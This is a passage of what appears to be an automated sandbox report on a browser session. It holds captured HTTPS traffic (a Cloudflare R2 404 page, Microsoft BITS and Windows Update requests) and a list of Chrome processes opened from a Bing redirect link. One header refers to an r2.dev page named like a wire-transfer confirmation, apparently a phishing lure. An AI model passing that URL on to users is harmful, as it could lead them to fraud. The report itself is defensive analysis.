                      Sec-Fetch-Dest: image
                      Referer: https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.html
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-04-16 14:25:26 UTC180INHTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:25:26 GMT
                      Content-Type: text/html
                      Content-Length: 27242
                      Connection: close
                      Server: cloudflare
                      CF-RAY: 8754d83cb88f6755-ATL
                      2024-04-16 14:25:26 UTC1189INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79
                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
                      2024-04-16 14:25:26 UTC1369INData Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20
                      Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
                      2024-04-16 14:25:26 UTC1369INData Raw: 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 66 6f 6f 74 65 72 2d 74 69 74 6c 65 22 3e 49 73 20 74 68 69 73 20 79 6f 75 72 20 62 75 63 6b 65 74 3f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/"
                      2024-04-16 14:25:26 UTC1369INData Raw: 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30
                      Data Ascii: l="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40
                      2024-04-16 14:25:26 UTC1369INData Raw: 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 4c 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 43 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 20 36 32 2e 34 37 32 20 39 38 2e 33 33 34 35 20 36 37 2e 38 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36
                      Data Ascii: <path d="M56.0777 105.406L60.9712 106.906C60.9712 106.906 62.472 98.3345 67.8304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406
                      2024-04-16 14:25:26 UTC1369INData Raw: 20 31 32 34 2e 37 31 37 20 31 30 36 2e 39 33 37 43 31 32 34 2e 30 35 38 20 31 30 36 2e 39 33 37 20 31 32 33 2e 34 30 36 20 31 30 37 2e 30 36 37 20 31 32 32 2e 37 39 38 20 31 30 37 2e 33 31 39 43 31 32 32 2e 31 38 39 20 31 30 37 2e 35 37 31 20 31 32 31 2e 36 33 36 20 31 30 37 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: 124.717 106.937C124.058 106.937 123.406 107.067 122.798 107.319C122.189 107.571 121.636 107.941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC"
                      2024-04-16 14:25:26 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 43 31 33 34 2e 39 39 35 20 34 38 2e 39 35 31 36 20 31 33 31 2e 31 30 36 20 34 35 2e 30 36 32 37 20 31 33 31 2e 31 30 36 20 34 30 2e 32 36 35 36 43 31 33 31 2e 31 30 36 20 33 35 2e 34 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20
                      Data Ascii: d="M139.792 48.9516C134.995 48.9516 131.106 45.0627 131.106 40.2656C131.106 35.4684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white"
                      2024-04-16 14:25:26 UTC1369INData Raw: 37 34 20 31 31 30 2e 33 35 37 20 34 34 2e 35 31 31 38 20 31 31 31 2e 34 37 32 20 34 34 2e 35 31 33 39 43 31 31 32 2e 35 38 38 20 34 34 2e 35 31 33 39 20 31 31 33 2e 36 35 38 20 34 34 2e 30 37 30 36 20 31 31 34 2e 34 34 37 20 34 33 2e 32 38 31 33 43 31 31 35 2e 32 33 37 20 34 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30
                      Data Ascii: 74 110.357 44.5118 111.472 44.5139C112.588 44.5139 113.658 44.0706 114.447 43.2813C115.237 42.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.550
                      2024-04-16 14:25:26 UTC1369INData Raw: 20 31 35 32 2e 36 34 31 20 31 32 37 2e 35 35 32 20 31 34 38 2e 32 34 39 20 31 32 37 2e 35 35 32 20 31 34 32 2e 38 33 31 43 31 32 37 2e 35 35 32 20 31 33 37 2e 34 31 32 20 31 33 31 2e 38 31 38 20 31 33 33 2e 30 32 20 31 33 37 2e 30 38 31 20 31 33 33 2e 30 32 43 31 34 32 2e 33 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67
                      Data Ascii: 152.641 127.552 148.249 127.552 142.831C127.552 137.412 131.818 133.02 137.081 133.02C142.344 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g
                      2024-04-16 14:25:26 UTC1369INData Raw: 36 2e 37 36 35 56 39 35 2e 32 34 33 37 48 31 30 33 2e 32 35 32 56 37 31 2e 31 39 32 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48
                      Data Ascii: 6.765V95.2437H103.252V71.1929Z" fill="#6ECCE5" /> <path d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449742184.31.62.93443
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:25:26 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-04-16 14:25:27 UTC468INHTTP/1.1 200 OK
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (chd/079C)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-eus2-z1
                      Cache-Control: public, max-age=146333
                      Date: Tue, 16 Apr 2024 14:25:26 GMT
                      Connection: close
                      X-CID: 2


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449744184.31.62.93443
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:25:27 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-04-16 14:25:27 UTC805INHTTP/1.1 200 OK
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (chd/0778)
                      X-CID: 11
                      X-CCC: US
                      X-Azure-Ref-OriginShield: Ref A: 52EA27DBDE0C4533B819423583F6692E Ref B: CH1AA2040902052 Ref C: 2023-07-09T23:10:08Z
                      X-MSEdge-Ref: Ref A: 528BB8D443C042AA9AEA4EC3F75C7762 Ref B: CHI30EDGE0111 Ref C: 2023-07-09T23:11:11Z
                      Content-Type: application/octet-stream
                      X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                      Cache-Control: public, max-age=146269
                      Date: Tue, 16 Apr 2024 14:25:27 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-04-16 14:25:27 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44974520.114.59.183443
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:25:39 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2024-04-16 14:25:39 UTC560INHTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                      MS-CorrelationId: e3a6285e-1a30-4714-976d-2732037bfeb5
                      MS-RequestId: fb9a9ae4-2a58-483f-a4b1-e5e435041fb6
                      MS-CV: oUOXW6yDNky49/i6.0
                      X-Microsoft-SLSClientCache: 2880
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 16 Apr 2024 14:25:38 GMT
                      Connection: close
                      Content-Length: 24490
                      2024-04-16 14:25:39 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                      2024-04-16 14:25:39 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.44975420.114.59.183443
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:26:16 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2024-04-16 14:26:17 UTC560INHTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                      MS-CorrelationId: e39d8fb8-3e2b-492c-b369-05a0b4a626b8
                      MS-RequestId: 42e3c0d1-21f2-427b-9f18-18a2fc436ac7
                      MS-CV: zNGT/ivCVEa+OLwg.0
                      X-Microsoft-SLSClientCache: 2160
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 16 Apr 2024 14:26:16 GMT
                      Connection: close
                      Content-Length: 25457
                      2024-04-16 14:26:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                      2024-04-16 14:26:17 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:16:25:19
                      Start date:16/04/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:2
                      Start time:16:25:20
                      Start date:16/04/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:3
                      Start time:16:25:22
                      Start date:16/04/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Disassembly

                      No disassembly